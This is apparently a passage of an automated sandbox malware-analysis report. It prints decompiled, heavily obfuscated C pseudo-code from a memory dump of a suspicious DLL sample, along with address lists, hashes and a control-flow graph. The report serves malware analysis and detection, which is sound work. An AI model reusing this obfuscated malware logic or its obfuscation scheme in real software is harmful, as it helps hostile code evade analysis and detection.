                                                                                                                                                                            				_v2616 = _v2616 ^ 0x007d2870;
                                                                                                                                                                            				_v2692 = 0x7d1b3a;
                                                                                                                                                                            				_t446 = 0x7d;
                                                                                                                                                                            				_v2692 = _v2692 * 0x5a;
                                                                                                                                                                            				_v2692 = _v2692 * 0x29;
                                                                                                                                                                            				_v2692 = _v2692 ^ 0x0b423dcb;
                                                                                                                                                                            				_v2724 = 0xbe8a04;
                                                                                                                                                                            				_v2724 = _v2724 * 0x27;
                                                                                                                                                                            				_v2724 = _v2724 | 0x44bf91fe;
                                                                                                                                                                            				_v2724 = _v2724 ^ 0x5dbe7768;
                                                                                                                                                                            				_v2636 = 0x66ae7e;
                                                                                                                                                                            				_v2636 = _v2636 + 0xffff18a5;
                                                                                                                                                                            				_v2636 = _v2636 ^ 0x006a6401;
                                                                                                                                                                            				_v2744 = 0x24afb7;
                                                                                                                                                                            				_v2744 = _v2744 + 0xf221;
                                                                                                                                                                            				_v2744 = _v2744 >> 2;
                                                                                                                                                                            				_v2744 = _v2744 ^ 0x00088a95;
                                                                                                                                                                            				_v2716 = 0x4884b4;
                                                                                                                                                                            				_v2716 = _v2716 | 0xbbb03a66;
                                                                                                                                                                            				_v2716 = _v2716 ^ 0xe76b33e5;
                                                                                                                                                                            				_v2716 = _v2716 ^ 0x5c9d38b7;
                                                                                                                                                                            				_v2672 = 0xd2ae7f;
                                                                                                                                                                            				_v2672 = _v2672 / _t446;
                                                                                                                                                                            				_v2672 = _v2672 ^ 0x00034be9;
                                                                                                                                                                            				_v2680 = 0x28809f;
                                                                                                                                                                            				_v2680 = _v2680 << 8;
                                                                                                                                                                            				_v2680 = _v2680 ^ 0x28858fb3;
                                                                                                                                                                            				_v2720 = 0x2529a6;
                                                                                                                                                                            				_t447 = 0x60;
                                                                                                                                                                            				_v2720 = _v2720 / _t447;
                                                                                                                                                                            				_t448 = 0x55;
                                                                                                                                                                            				_v2720 = _v2720 / _t448;
                                                                                                                                                                            				_v2720 = _v2720 ^ 0x00015f05;
                                                                                                                                                                            				_v2728 = 0xe4ec68;
                                                                                                                                                                            				_v2728 = _v2728 | 0x076980de;
                                                                                                                                                                            				_v2728 = _v2728 >> 0x10;
                                                                                                                                                                            				_v2728 = _v2728 ^ 0x00066f44;
                                                                                                                                                                            				_v2764 = 0x25662b;
                                                                                                                                                                            				_v2764 = _v2764 + 0x352e;
                                                                                                                                                                            				_v2764 = _v2764 + 0xd238;
                                                                                                                                                                            				_v2764 = _v2764 >> 9;
                                                                                                                                                                            				_v2764 = _v2764 ^ 0x0003808d;
                                                                                                                                                                            				_v2696 = 0xd79a4d;
                                                                                                                                                                            				_v2696 = _v2696 >> 0xf;
                                                                                                                                                                            				_v2696 = _v2696 | 0xe296257b;
                                                                                                                                                                            				_v2696 = _v2696 ^ 0xe2941eeb;
                                                                                                                                                                            				_v2704 = 0x8f07c6;
                                                                                                                                                                            				_v2704 = _v2704 << 6;
                                                                                                                                                                            				_v2704 = _v2704 << 0xb;
                                                                                                                                                                            				_v2704 = _v2704 ^ 0x0f8cdb18;
                                                                                                                                                                            				_v2772 = 0x165ad0;
                                                                                                                                                                            				_v2772 = _v2772 * 0x45;
                                                                                                                                                                            				_v2772 = _v2772 * 0xe;
                                                                                                                                                                            				_v2772 = _v2772 | 0xc27a990b;
                                                                                                                                                                            				_v2772 = _v2772 ^ 0xd67b0e5a;
                                                                                                                                                                            				_v2712 = 0x3a0787;
                                                                                                                                                                            				_v2712 = _v2712 << 9;
                                                                                                                                                                            				_v2712 = _v2712 << 3;
                                                                                                                                                                            				_v2712 = _v2712 ^ 0xa0756bb8;
                                                                                                                                                                            				_v2768 = 0xd1f7d1;
                                                                                                                                                                            				_v2768 = _v2768 ^ 0x28b4518a;
                                                                                                                                                                            				_v2768 = _v2768 ^ 0x2c50bf5e;
                                                                                                                                                                            				_v2768 = _v2768 << 1;
                                                                                                                                                                            				_v2768 = _v2768 ^ 0x086bcac7;
                                                                                                                                                                            				_v2664 = 0x43880;
                                                                                                                                                                            				_v2664 = _v2664 << 2;
                                                                                                                                                                            				_v2664 = _v2664 ^ 0x001745f4;
                                                                                                                                                                            				_v2776 = 0x99bfba;
                                                                                                                                                                            				_v2776 = _v2776 + 0xb20b;
                                                                                                                                                                            				_v2776 = _v2776 ^ 0x9325107f;
                                                                                                                                                                            				_v2776 = _v2776 ^ 0x1bb55bce;
                                                                                                                                                                            				_v2776 = _v2776 ^ 0x880f35ab;
                                                                                                                                                                            				_v2784 = 0xcf6f67;
                                                                                                                                                                            				_v2784 = _v2784 | 0xe7eb8da5;
                                                                                                                                                                            				_t449 = 0x69;
                                                                                                                                                                            				_v2784 = _v2784 * 5;
                                                                                                                                                                            				_v2784 = _v2784 >> 0xc;
                                                                                                                                                                            				_v2784 = _v2784 ^ 0x000ae4cd;
                                                                                                                                                                            				_v2792 = 0x938e6a;
                                                                                                                                                                            				_v2792 = _v2792 * 0x34;
                                                                                                                                                                            				_v2792 = _v2792 + 0xd82d;
                                                                                                                                                                            				_v2792 = _v2792 + 0xffff3001;
                                                                                                                                                                            				_v2792 = _v2792 ^ 0x1dfcfd52;
                                                                                                                                                                            				_v2640 = 0x59feb;
                                                                                                                                                                            				_v2640 = _v2640 + 0xffffbab8;
                                                                                                                                                                            				_v2640 = _v2640 ^ 0x000de14c;
                                                                                                                                                                            				_v2760 = 0x4f2f51;
                                                                                                                                                                            				_v2760 = _v2760 << 3;
                                                                                                                                                                            				_v2760 = _v2760 | 0xca7d0b31;
                                                                                                                                                                            				_v2760 = _v2760 >> 5;
                                                                                                                                                                            				_v2760 = _v2760 ^ 0x06504f0f;
                                                                                                                                                                            				_v2648 = 0x12de1c;
                                                                                                                                                                            				_v2648 = _v2648 << 2;
                                                                                                                                                                            				_v2648 = _v2648 ^ 0x0044c65b;
                                                                                                                                                                            				_v2656 = 0xedb7d1;
                                                                                                                                                                            				_v2656 = _v2656 >> 0xe;
                                                                                                                                                                            				_v2656 = _v2656 ^ 0x00060f5a;
                                                                                                                                                                            				_v2624 = 0x25ed17;
                                                                                                                                                                            				_v2624 = _v2624 << 8;
                                                                                                                                                                            				_v2624 = _v2624 ^ 0x25e602f4;
                                                                                                                                                                            				_v2632 = 0xdb105d;
                                                                                                                                                                            				_v2632 = _v2632 + 0xbf07;
                                                                                                                                                                            				_v2632 = _v2632 ^ 0x00d56ea2;
                                                                                                                                                                            				_v2752 = 0xdb9922;
                                                                                                                                                                            				_v2752 = _v2752 + 0xffff5c98;
                                                                                                                                                                            				_t422 = _v2752 / _t449;
                                                                                                                                                                            				_v2752 = _t422;
                                                                                                                                                                            				_v2752 = _v2752 + 0xe0a7;
                                                                                                                                                                            				_v2752 = _v2752 ^ 0x000f564b;
                                                                                                                                                                            				_v2748 = 0x373105;
                                                                                                                                                                            				_v2748 = _v2748 + 0xffff8875;
                                                                                                                                                                            				_v2748 = _v2748 | 0xab9c3c2b;
                                                                                                                                                                            				_v2748 = _v2748 ^ 0xabbdde7d;
                                                                                                                                                                            				while(_t488 != 0x219adc7) {
                                                                                                                                                                            					if(_t488 == 0x472b880) {
                                                                                                                                                                            						E02F51A34(_v2672,  &_v1040, _t449, _t449, _v2680, _v2720, _v2728, _t449, _v2736, _v2764);
                                                                                                                                                                            						_push(_v2712);
                                                                                                                                                                            						_push(_v2772);
                                                                                                                                                                            						_push(_v2704);
                                                                                                                                                                            						E02F72D0A(_v2664, __eflags,  &_v2080, _v2776, _v2784, _v2792, 0x2f5192c,  &_v520,  &_v1040, E02F6E1F8(0x2f5192c, _v2696, __eflags));
                                                                                                                                                                            						E02F6FECB(_t424, _v2640, _v2760, _v2648, _v2656);
                                                                                                                                                                            						__eflags = 0;
                                                                                                                                                                            						return E02F685FF(_v2624, _v2632, 0, 0,  &_v520, 0, _v2752, 0, _v2748);
                                                                                                                                                                            					}
                                                                                                                                                                            					_t500 = _t488 - 0x6430241;
                                                                                                                                                                            					if(_t488 != 0x6430241) {
                                                                                                                                                                            						L7:
                                                                                                                                                                            						__eflags = _t488 - 0xc99ad3;
                                                                                                                                                                            						if(__eflags != 0) {
                                                                                                                                                                            							continue;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							return _t422;
                                                                                                                                                                            						}
                                                                                                                                                                            						L10:
                                                                                                                                                                            						return _t422;
                                                                                                                                                                            					}
                                                                                                                                                                            					E02F70DB1(_v2788,  &_v2600, _t500, _v2660, _t449, _v2688);
                                                                                                                                                                            					 *((short*)(E02F609DD(_v2700,  &_v2600, _v2676, _v2740))) = 0;
                                                                                                                                                                            					E02F5BAA9(_v2612, _v2668, _t500, _v2756, _v2628,  &_v1560);
                                                                                                                                                                            					_push(_v2684);
                                                                                                                                                                            					_push(_v2732);
                                                                                                                                                                            					_push(_v2620);
                                                                                                                                                                            					E02F72D0A(_v2608, _t500,  &_v1560, _v2644, _v2604, _v2652, 0x2f5188c,  &_v2080,  &_v2600, E02F6E1F8(0x2f5188c, _v2780, _t500));
                                                                                                                                                                            					E02F6FECB(_t436, _v2616, _v2692, _v2724, _v2636);
                                                                                                                                                                            					_t449 = _v2744;
                                                                                                                                                                            					_t422 = E02F5BFBE( &_v2080, _t487, _v2716);
                                                                                                                                                                            					_t492 =  &(_t492[0x18]);
                                                                                                                                                                            					if(_t422 != 0) {
                                                                                                                                                                            						_t488 = 0x472b880;
                                                                                                                                                                            						continue;
                                                                                                                                                                            					}
                                                                                                                                                                            					goto L10;
                                                                                                                                                                            				}
                                                                                                                                                                            				_t488 = 0x6430241;
                                                                                                                                                                            				goto L7;
                                                                                                                                                                            			}


































































                                                                                                                                                                            0x02f6a474
                                                                                                                                                                            0x02f6a47e
                                                                                                                                                                            0x02f6a480
                                                                                                                                                                            0x02f6a48a
                                                                                                                                                                            0x02f6a492
                                                                                                                                                                            0x02f6a497
                                                                                                                                                                            0x02f6a49f
                                                                                                                                                                            0x02f6a4a7
                                                                                                                                                                            0x02f6a4af
                                                                                                                                                                            0x02f6a4b4
                                                                                                                                                                            0x02f6a4bc
                                                                                                                                                                            0x02f6a4c4
                                                                                                                                                                            0x02f6a4cf
                                                                                                                                                                            0x02f6a4d7
                                                                                                                                                                            0x02f6a4e2
                                                                                                                                                                            0x02f6a4ea
                                                                                                                                                                            0x02f6a4ef
                                                                                                                                                                            0x02f6a4f7
                                                                                                                                                                            0x02f6a4ff
                                                                                                                                                                            0x02f6a507
                                                                                                                                                                            0x02f6a50b
                                                                                                                                                                            0x02f6a513
                                                                                                                                                                            0x02f6a51b
                                                                                                                                                                            0x02f6a526
                                                                                                                                                                            0x02f6a52e
                                                                                                                                                                            0x02f6a539
                                                                                                                                                                            0x02f6a541
                                                                                                                                                                            0x02f6a546
                                                                                                                                                                            0x02f6a54a
                                                                                                                                                                            0x02f6a552
                                                                                                                                                                            0x02f6a55d
                                                                                                                                                                            0x02f6a568
                                                                                                                                                                            0x02f6a573
                                                                                                                                                                            0x02f6a586
                                                                                                                                                                            0x02f6a58d
                                                                                                                                                                            0x02f6a598
                                                                                                                                                                            0x02f6a59d
                                                                                                                                                                            0x02f6a5a5
                                                                                                                                                                            0x02f6a5aa
                                                                                                                                                                            0x02f6a5b9
                                                                                                                                                                            0x02f6a5bc
                                                                                                                                                                            0x02f6a5c0
                                                                                                                                                                            0x02f6a5c8
                                                                                                                                                                            0x02f6a5d3
                                                                                                                                                                            0x02f6a5de
                                                                                                                                                                            0x02f6a5e9
                                                                                                                                                                            0x02f6a5f1
                                                                                                                                                                            0x02f6a5f9
                                                                                                                                                                            0x02f6a5fe
                                                                                                                                                                            0x02f6a603
                                                                                                                                                                            0x02f6a60b
                                                                                                                                                                            0x02f6a616
                                                                                                                                                                            0x02f6a621
                                                                                                                                                                            0x02f6a62c
                                                                                                                                                                            0x02f6a634
                                                                                                                                                                            0x02f6a639
                                                                                                                                                                            0x02f6a641
                                                                                                                                                                            0x02f6a649
                                                                                                                                                                            0x02f6a65f
                                                                                                                                                                            0x02f6a666
                                                                                                                                                                            0x02f6a671
                                                                                                                                                                            0x02f6a67d
                                                                                                                                                                            0x02f6a680
                                                                                                                                                                            0x02f6a684
                                                                                                                                                                            0x02f6a68c
                                                                                                                                                                            0x02f6a694
                                                                                                                                                                            0x02f6a6a7
                                                                                                                                                                            0x02f6a6ae
                                                                                                                                                                            0x02f6a6bb
                                                                                                                                                                            0x02f6a6c6
                                                                                                                                                                            0x02f6a6d1
                                                                                                                                                                            0x02f6a6dc
                                                                                                                                                                            0x02f6a6e7
                                                                                                                                                                            0x02f6a6ef
                                                                                                                                                                            0x02f6a6fa
                                                                                                                                                                            0x02f6a705
                                                                                                                                                                            0x02f6a710
                                                                                                                                                                            0x02f6a71b
                                                                                                                                                                            0x02f6a726
                                                                                                                                                                            0x02f6a731
                                                                                                                                                                            0x02f6a73c
                                                                                                                                                                            0x02f6a74b
                                                                                                                                                                            0x02f6a74e
                                                                                                                                                                            0x02f6a757
                                                                                                                                                                            0x02f6a75b
                                                                                                                                                                            0x02f6a763
                                                                                                                                                                            0x02f6a770
                                                                                                                                                                            0x02f6a774
                                                                                                                                                                            0x02f6a77c
                                                                                                                                                                            0x02f6a784
                                                                                                                                                                            0x02f6a78f
                                                                                                                                                                            0x02f6a79a
                                                                                                                                                                            0x02f6a7a5
                                                                                                                                                                            0x02f6a7ad
                                                                                                                                                                            0x02f6a7b5
                                                                                                                                                                            0x02f6a7ba
                                                                                                                                                                            0x02f6a7c2
                                                                                                                                                                            0x02f6a7ca
                                                                                                                                                                            0x02f6a7d2
                                                                                                                                                                            0x02f6a7da
                                                                                                                                                                            0x02f6a7e2
                                                                                                                                                                            0x02f6a7f8
                                                                                                                                                                            0x02f6a7ff
                                                                                                                                                                            0x02f6a80a
                                                                                                                                                                            0x02f6a815
                                                                                                                                                                            0x02f6a81d
                                                                                                                                                                            0x02f6a828
                                                                                                                                                                            0x02f6a834
                                                                                                                                                                            0x02f6a839
                                                                                                                                                                            0x02f6a843
                                                                                                                                                                            0x02f6a846
                                                                                                                                                                            0x02f6a84a
                                                                                                                                                                            0x02f6a852
                                                                                                                                                                            0x02f6a85a
                                                                                                                                                                            0x02f6a862
                                                                                                                                                                            0x02f6a867
                                                                                                                                                                            0x02f6a86f
                                                                                                                                                                            0x02f6a877
                                                                                                                                                                            0x02f6a87f
                                                                                                                                                                            0x02f6a887
                                                                                                                                                                            0x02f6a88c
                                                                                                                                                                            0x02f6a894
                                                                                                                                                                            0x02f6a89c
                                                                                                                                                                            0x02f6a8a1
                                                                                                                                                                            0x02f6a8a9
                                                                                                                                                                            0x02f6a8b1
                                                                                                                                                                            0x02f6a8b9
                                                                                                                                                                            0x02f6a8be
                                                                                                                                                                            0x02f6a8c3
                                                                                                                                                                            0x02f6a8cb
                                                                                                                                                                            0x02f6a8d8
                                                                                                                                                                            0x02f6a8e1
                                                                                                                                                                            0x02f6a8e7
                                                                                                                                                                            0x02f6a8f4
                                                                                                                                                                            0x02f6a901
                                                                                                                                                                            0x02f6a909
                                                                                                                                                                            0x02f6a90e
                                                                                                                                                                            0x02f6a913
                                                                                                                                                                            0x02f6a91b
                                                                                                                                                                            0x02f6a923
                                                                                                                                                                            0x02f6a92b
                                                                                                                                                                            0x02f6a933
                                                                                                                                                                            0x02f6a937
                                                                                                                                                                            0x02f6a93f
                                                                                                                                                                            0x02f6a94a
                                                                                                                                                                            0x02f6a952
                                                                                                                                                                            0x02f6a95d
                                                                                                                                                                            0x02f6a965
                                                                                                                                                                            0x02f6a96d
                                                                                                                                                                            0x02f6a975
                                                                                                                                                                            0x02f6a97d
                                                                                                                                                                            0x02f6a985
                                                                                                                                                                            0x02f6a98d
                                                                                                                                                                            0x02f6a99c
                                                                                                                                                                            0x02f6a99d
                                                                                                                                                                            0x02f6a9a1
                                                                                                                                                                            0x02f6a9a6
                                                                                                                                                                            0x02f6a9ae
                                                                                                                                                                            0x02f6a9bb
                                                                                                                                                                            0x02f6a9bf
                                                                                                                                                                            0x02f6a9c7
                                                                                                                                                                            0x02f6a9cf
                                                                                                                                                                            0x02f6a9d7
                                                                                                                                                                            0x02f6a9e2
                                                                                                                                                                            0x02f6a9ed
                                                                                                                                                                            0x02f6a9f8
                                                                                                                                                                            0x02f6aa00
                                                                                                                                                                            0x02f6aa05
                                                                                                                                                                            0x02f6aa0d
                                                                                                                                                                            0x02f6aa12
                                                                                                                                                                            0x02f6aa1a
                                                                                                                                                                            0x02f6aa25
                                                                                                                                                                            0x02f6aa2d
                                                                                                                                                                            0x02f6aa38
                                                                                                                                                                            0x02f6aa43
                                                                                                                                                                            0x02f6aa4b
                                                                                                                                                                            0x02f6aa56
                                                                                                                                                                            0x02f6aa61
                                                                                                                                                                            0x02f6aa69
                                                                                                                                                                            0x02f6aa74
                                                                                                                                                                            0x02f6aa7f
                                                                                                                                                                            0x02f6aa8a
                                                                                                                                                                            0x02f6aa95
                                                                                                                                                                            0x02f6aa9d
                                                                                                                                                                            0x02f6aaa9
                                                                                                                                                                            0x02f6aaab
                                                                                                                                                                            0x02f6aaaf
                                                                                                                                                                            0x02f6aab7
                                                                                                                                                                            0x02f6aabf
                                                                                                                                                                            0x02f6aac7
                                                                                                                                                                            0x02f6aacf
                                                                                                                                                                            0x02f6aad7
                                                                                                                                                                            0x02f6aadf
                                                                                                                                                                            0x02f6aaed
                                                                                                                                                                            0x02f6ac4c
                                                                                                                                                                            0x02f6ac51
                                                                                                                                                                            0x02f6ac5d
                                                                                                                                                                            0x02f6ac61
                                                                                                                                                                            0x02f6acaa
                                                                                                                                                                            0x02f6acca
                                                                                                                                                                            0x02f6acd9
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6acfa
                                                                                                                                                                            0x02f6aaf3
                                                                                                                                                                            0x02f6aaf5
                                                                                                                                                                            0x02f6ac13
                                                                                                                                                                            0x02f6ac13
                                                                                                                                                                            0x02f6ac19
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6ad07
                                                                                                                                                                            0x02f6ad07
                                                                                                                                                                            0x02f6ad07
                                                                                                                                                                            0x02f6ab12
                                                                                                                                                                            0x02f6ab37
                                                                                                                                                                            0x02f6ab5b
                                                                                                                                                                            0x02f6ab60
                                                                                                                                                                            0x02f6ab6c
                                                                                                                                                                            0x02f6ab70
                                                                                                                                                                            0x02f6abc2
                                                                                                                                                                            0x02f6abe2
                                                                                                                                                                            0x02f6abee
                                                                                                                                                                            0x02f6abfa
                                                                                                                                                                            0x02f6abff
                                                                                                                                                                            0x02f6ac04
                                                                                                                                                                            0x02f6ac0a
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6ac0a
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6ac04
                                                                                                                                                                            0x02f6ac11
                                                                                                                                                                            0x00000000

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: $P$%Z$+f%$.5$.7Y$L$Q/O$h$p(}$spC$3k$n,
                                                                                                                                                                            • API String ID: 0-500290626
                                                                                                                                                                            • Opcode ID: 8937a3f5dc13cdfc9aa2ad382e0da0ff337f0f3a21f54850cff5625ef730bb20
                                                                                                                                                                            • Instruction ID: ad4391607a6b4a11ecc8f36fc61e1a4b7bcff7de0de4665dd1fbed470171e6d0
                                                                                                                                                                            • Opcode Fuzzy Hash: 8937a3f5dc13cdfc9aa2ad382e0da0ff337f0f3a21f54850cff5625ef730bb20
                                                                                                                                                                            • Instruction Fuzzy Hash: 3712E1714093809FD3A9CF60C989A9BFBE1FBC4348F108A1DE2DA96260D7B58549CF57
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 660 2f6d1bc-2f6d5dd call 2f6fe29 663 2f6d5e8 660->663 664 2f6d5ed-2f6d5f3 663->664 665 2f6d78f-2f6d795 664->665 666 2f6d5f9 664->666 667 2f6d870-2f6d8aa call 2f6fe2a 665->667 668 2f6d79b-2f6d7a1 665->668 669 2f6d5ff-2f6d605 666->669 670 2f6d708-2f6d774 call 2f667e6 666->670 697 2f6d8b1 667->697 672 2f6d7a7-2f6d7ad 668->672 673 2f6d851-2f6d86b call 2f72b09 668->673 674 2f6d60b-2f6d611 669->674 675 2f6d6c8-2f6d6dd 669->675 687 2f6d776-2f6d77b 670->687 688 2f6d780 670->688 679 2f6d801-2f6d84f call 2f72b09 * 3 672->679 680 2f6d7af-2f6d7b1 672->680 703 2f6d785-2f6d78a 673->703 681 2f6d613-2f6d619 674->681 682 2f6d691-2f6d6a8 674->682 683 2f6d6e6-2f6d6ed call 2f62e5d 675->683 684 2f6d6df-2f6d6e4 call 2f580c0 675->684 679->697 692 2f6d8b6-2f6d8bc 680->692 693 2f6d7b7-2f6d7fc call 2f6cca0 call 2f5e404 680->693 694 2f6d65f-2f6d681 call 2f65779 681->694 695 2f6d61b-2f6d621 681->695 689 2f6d6b0-2f6d6b8 682->689 690 2f6d6aa-2f6d6ad 682->690 706 2f6d6f2-2f6d703 683->706 684->706 687->663 688->703 701 2f6d8c4-2f6d8ca 689->701 702 2f6d6be-2f6d6c3 689->702 690->689 692->664 705 2f6d8c2 692->705 693->663 709 2f6d8ce-2f6d8da 694->709 715 2f6d687-2f6d68c 694->715 695->692 708 2f6d627-2f6d647 call 2f56b7a 695->708 697->692 701->709 702->663 703->663 705->709 706->664 720 2f6d653 708->720 721 2f6d649-2f6d651 708->721 715->663 722 2f6d658-2f6d65d 720->722 721->722 722->663
                                                                                                                                                                            C-Code - Quality: 86%
                                                                                                                                                                            			E02F6D1BC(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                                                                                            				char _v260;
                                                                                                                                                                            				char _v268;
                                                                                                                                                                            				intOrPtr _v272;
                                                                                                                                                                            				char _v276;
                                                                                                                                                                            				intOrPtr _v280;
                                                                                                                                                                            				char _v284;
                                                                                                                                                                            				intOrPtr _v288;
                                                                                                                                                                            				signed int _v292;
                                                                                                                                                                            				signed int _v296;
                                                                                                                                                                            				signed int _v300;
                                                                                                                                                                            				signed int _v304;
                                                                                                                                                                            				signed int _v308;
                                                                                                                                                                            				signed int _v312;
                                                                                                                                                                            				signed int _v316;
                                                                                                                                                                            				signed int _v320;
                                                                                                                                                                            				signed int _v324;
                                                                                                                                                                            				signed int _v328;
                                                                                                                                                                            				signed int _v332;
                                                                                                                                                                            				signed int _v336;
                                                                                                                                                                            				signed int _v340;
                                                                                                                                                                            				signed int _v344;
                                                                                                                                                                            				signed int _v348;
                                                                                                                                                                            				signed int _v352;
                                                                                                                                                                            				signed int _v356;
                                                                                                                                                                            				signed int _v360;
                                                                                                                                                                            				signed int _v364;
                                                                                                                                                                            				signed int _v368;
                                                                                                                                                                            				signed int _v372;
                                                                                                                                                                            				signed int _v376;
                                                                                                                                                                            				signed int _v380;
                                                                                                                                                                            				signed int _v384;
                                                                                                                                                                            				signed int _v388;
                                                                                                                                                                            				signed int _v392;
                                                                                                                                                                            				signed int _v396;
                                                                                                                                                                            				signed int _v400;
                                                                                                                                                                            				signed int _v404;
                                                                                                                                                                            				signed int _v408;
                                                                                                                                                                            				signed int _v412;
                                                                                                                                                                            				signed int _v416;
                                                                                                                                                                            				void* _t309;
                                                                                                                                                                            				void* _t322;
                                                                                                                                                                            				intOrPtr _t325;
                                                                                                                                                                            				intOrPtr _t328;
                                                                                                                                                                            				intOrPtr _t332;
                                                                                                                                                                            				void* _t336;
                                                                                                                                                                            				intOrPtr _t338;
                                                                                                                                                                            				intOrPtr _t340;
                                                                                                                                                                            				intOrPtr _t341;
                                                                                                                                                                            				void* _t343;
                                                                                                                                                                            				intOrPtr _t346;
                                                                                                                                                                            				void* _t349;
                                                                                                                                                                            				intOrPtr _t364;
                                                                                                                                                                            				intOrPtr _t365;
                                                                                                                                                                            				void* _t382;
                                                                                                                                                                            				intOrPtr _t385;
                                                                                                                                                                            				void* _t390;
                                                                                                                                                                            				signed int _t391;
                                                                                                                                                                            				signed int _t392;
                                                                                                                                                                            				signed int _t393;
                                                                                                                                                                            				intOrPtr _t394;
                                                                                                                                                                            				void* _t395;
                                                                                                                                                                            				void* _t396;
                                                                                                                                                                            				void* _t397;
                                                                                                                                                                            				void* _t399;
                                                                                                                                                                            
                                                                                                                                                                            				_push(_a24);
                                                                                                                                                                            				_t395 = __edx;
                                                                                                                                                                            				_push(_a20);
                                                                                                                                                                            				_v288 = __ecx;
                                                                                                                                                                            				_push(_a16);
                                                                                                                                                                            				_push(_a12);
                                                                                                                                                                            				_push(_a8);
                                                                                                                                                                            				_push(_a4);
                                                                                                                                                                            				_push(__edx);
                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                            				E02F6FE29(__ecx);
                                                                                                                                                                            				_v312 = 0xeda4ef;
                                                                                                                                                                            				_t397 = _t396 + 0x20;
                                                                                                                                                                            				_v312 = _v312 + 0x7c87;
                                                                                                                                                                            				_v312 = _v312 ^ 0x00e6bc42;
                                                                                                                                                                            				_t346 = 0;
                                                                                                                                                                            				_v356 = 0x83a7cc;
                                                                                                                                                                            				_t349 = 0x902256d;
                                                                                                                                                                            				_v356 = _v356 << 0xd;
                                                                                                                                                                            				_v356 = _v356 | 0xd496e6a5;
                                                                                                                                                                            				_v356 = _v356 ^ 0xf4f8676c;
                                                                                                                                                                            				_v388 = 0x254bab;
                                                                                                                                                                            				_v388 = _v388 | 0x2708e00f;
                                                                                                                                                                            				_v388 = _v388 << 0xc;
                                                                                                                                                                            				_v388 = _v388 << 0xa;
                                                                                                                                                                            				_v388 = _v388 ^ 0xebca5aa3;
                                                                                                                                                                            				_v376 = 0x3a43eb;
                                                                                                                                                                            				_v376 = _v376 + 0x5e30;
                                                                                                                                                                            				_v376 = _v376 ^ 0x2d5dec97;
                                                                                                                                                                            				_v376 = _v376 ^ 0x2d6492cf;
                                                                                                                                                                            				_v324 = 0x965e68;
                                                                                                                                                                            				_v324 = _v324 ^ 0x4fad172c;
                                                                                                                                                                            				_v324 = _v324 ^ 0x4f30eea0;
                                                                                                                                                                            				_v404 = 0x95ea8f;
                                                                                                                                                                            				_t391 = 0x3c;
                                                                                                                                                                            				_v404 = _v404 / _t391;
                                                                                                                                                                            				_v404 = _v404 << 0xc;
                                                                                                                                                                            				_v404 = _v404 | 0x93230375;
                                                                                                                                                                            				_v404 = _v404 ^ 0xb7f3bbc9;
                                                                                                                                                                            				_v296 = 0x950835;
                                                                                                                                                                            				_v296 = _v296 + 0xffff217e;
                                                                                                                                                                            				_v296 = _v296 ^ 0x0090010d;
                                                                                                                                                                            				_v412 = 0x146e3b;
                                                                                                                                                                            				_v412 = _v412 ^ 0xfee339d3;
                                                                                                                                                                            				_v412 = _v412 | 0x08dab50c;
                                                                                                                                                                            				_v412 = _v412 << 5;
                                                                                                                                                                            				_v412 = _v412 ^ 0xdff21b2d;
                                                                                                                                                                            				_v316 = 0x73cd3;
                                                                                                                                                                            				_v316 = _v316 << 0xb;
                                                                                                                                                                            				_v316 = _v316 ^ 0x39e53ce3;
                                                                                                                                                                            				_v304 = 0x17d1c9;
                                                                                                                                                                            				_v304 = _v304 | 0x32076b61;
                                                                                                                                                                            				_v304 = _v304 ^ 0x32193df4;
                                                                                                                                                                            				_v400 = 0xe22ffc;
                                                                                                                                                                            				_v400 = _v400 * 0xf;
                                                                                                                                                                            				_v400 = _v400 << 8;
                                                                                                                                                                            				_v400 = _v400 >> 5;
                                                                                                                                                                            				_v400 = _v400 ^ 0x020db90e;
                                                                                                                                                                            				_v360 = 0x4e823d;
                                                                                                                                                                            				_v360 = _v360 >> 7;
                                                                                                                                                                            				_v360 = _v360 >> 0xc;
                                                                                                                                                                            				_v360 = _v360 ^ 0x000f4c82;
                                                                                                                                                                            				_v332 = 0x37cdc;
                                                                                                                                                                            				_v332 = _v332 >> 0xe;
                                                                                                                                                                            				_v332 = _v332 ^ 0x000cfe6d;
                                                                                                                                                                            				_v392 = 0x36521e;
                                                                                                                                                                            				_v392 = _v392 << 2;
                                                                                                                                                                            				_v392 = _v392 ^ 0x01f25d84;
                                                                                                                                                                            				_v392 = _v392 + 0xffff6602;
                                                                                                                                                                            				_v392 = _v392 ^ 0x0122fac3;
                                                                                                                                                                            				_v292 = 0x811559;
                                                                                                                                                                            				_v292 = _v292 ^ 0x63e4ed2d;
                                                                                                                                                                            				_v292 = _v292 ^ 0x636b0aa2;
                                                                                                                                                                            				_v408 = 0xc9a98b;
                                                                                                                                                                            				_v408 = _v408 ^ 0x273a7ab7;
                                                                                                                                                                            				_t392 = 0x3d;
                                                                                                                                                                            				_v408 = _v408 / _t392;
                                                                                                                                                                            				_v408 = _v408 | 0xd16a0a28;
                                                                                                                                                                            				_v408 = _v408 ^ 0xd1e35630;
                                                                                                                                                                            				_v352 = 0x4de238;
                                                                                                                                                                            				_v352 = _v352 ^ 0xe481f79a;
